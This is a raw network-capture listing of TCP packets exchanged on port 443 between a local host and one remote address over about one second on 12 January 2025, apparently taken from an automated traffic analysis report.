Jan 12, 2025 04:11:58.726784945 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.729136944 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.729198933 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.729239941 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.729295015 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.732213020 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.732275009 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.732306957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.732456923 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.809463978 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.809541941 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.844887018 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.844943047 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.844976902 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.845074892 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.845074892 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.845074892 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.845141888 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.845204115 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.847841978 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.847923040 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.851248026 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.851341963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.864682913 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.864975929 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.866403103 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.866492987 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.872909069 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.872977972 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.876960993 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.877042055 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.883197069 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.883264065 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.886544943 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.886617899 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.889909983 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.889982939 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.896555901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.896625996 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.899789095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.899852037 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.906678915 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.906759024 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.909846067 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.909917116 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.913242102 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.913372040 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.919806957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.919872999 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.923331976 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.923398972 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.931183100 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.931246042 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.934206009 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.934281111 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.937582970 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.937649965 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.945130110 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.945195913 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.947727919 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.947794914 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.954237938 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.954319000 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.957798958 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.957873106 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.965490103 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.965574980 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.967232943 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.967303038 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.970189095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.970258951 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.976850986 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.976918936 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.980084896 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.980153084 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.987744093 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.987812042 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.991293907 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.991363049 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:58.994724989 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:58.994792938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.001363039 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.001432896 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.004667997 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.004735947 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.011343956 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.011405945 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.014703989 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.014770985 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.017986059 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.018047094 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.023691893 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.023756027 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.026895046 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.026959896 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.033526897 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.033595085 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.037097931 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.037172079 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.043776989 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.043837070 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.047096014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.047179937 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.050462961 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.050534010 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.057172060 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.057250977 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.060492992 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.060554981 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.067135096 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.067215919 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.070518017 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.070585966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.140208960 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.140311003 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.143611908 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.143683910 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.145939112 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.146011114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.150978088 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.151068926 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.153126001 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.153199911 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.155477047 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.155553102 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.160106897 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.160175085 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.162554026 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.162621975 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.167117119 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.167191982 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.169646025 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.169713020 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.174350977 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.174420118 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.176593065 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.176662922 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.178926945 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.178996086 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.183708906 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.183778048 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.186058998 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.186136007 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.190773010 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.190845966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.193223953 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.193314075 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.195508957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.195590973 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.200212955 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.200301886 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.202492952 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.202585936 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.207180023 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.207268953 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.209444046 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.209522963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.214179993 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.214267969 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.216538906 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.216619968 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.218843937 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.218918085 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.223573923 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.223648071 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.225820065 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.225894928 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.230592966 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.230674982 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.233381033 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.233469963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.235255957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.235337019 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.239999056 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.240063906 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.242350101 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.242427111 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.247170925 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.247240067 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.249510050 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.249586105 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.251853943 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.251924992 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.256409883 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.256479025 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.258776903 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.258842945 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.263664961 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.263732910 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.265853882 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.265923023 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.270720005 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.270790100 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.272991896 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.273061037 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.275270939 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.275342941 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.279906034 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.279973030 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.282316923 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.282387972 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.286914110 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.286977053 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.289217949 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.289284945 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.291569948 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.291646957 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.296127081 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.296195984 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.300190926 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.300260067 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.304725885 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.304794073 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.309257984 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.309324026 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.312444925 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.312514067 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.316875935 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.316945076 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.330612898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.330686092 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.334640026 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.334753990 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.342704058 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.342777967 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.346236944 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.346318007 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.347795963 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.347866058 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.349708080 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.349778891 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.354023933 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.354103088 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.362709999 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.362828016 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.365564108 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.365633011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.367443085 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.367511034 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.436992884 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.437196016 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.437875032 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.437949896 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.445040941 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.445127964 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.446948051 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.447011948 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.449804068 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.449873924 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.451494932 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.451560974 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.458374023 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.458441973 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.460592031 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.460660934 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.462961912 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.463032961 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.470228910 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.470304012 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.471571922 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.471638918 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.472203016 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.472266912 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.474975109 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.475044966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.477024078 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.477088928 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.484067917 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.484143019 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.484930038 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.484997988 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.491101027 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.491170883 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.491776943 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.491846085 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.498261929 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.498332024 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.500889063 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.500968933 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.503550053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.503623009 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.505162001 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.505229950 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.507517099 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.507584095 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.509900093 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.509974003 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.517065048 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.517134905 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.517608881 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.517676115 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.526515961 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.526590109 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.527031898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.527098894 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.528220892 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.528290033 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.530874014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.530951977 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.533416986 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.533487082 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.541874886 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.541974068 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.542176008 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.542243958 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.545236111 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.545306921 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.547396898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.547468901 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.549948931 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.550019026 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.551628113 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.551703930 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.552925110 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.552995920 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.555277109 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.555349112 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.556523085 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.556586981 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.557770014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.557836056 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.560165882 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.560233116 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.561467886 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.561530113 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.563919067 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.563987017 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.565036058 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.565100908 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.566257954 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.566328049 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.571217060 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.571285963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.571301937 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.571367025 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.573319912 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.573386908 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.578933954 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:11:59.579003096 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:11:59.579016924 CET	443	49992	118.178.60.9	192.168.2.4
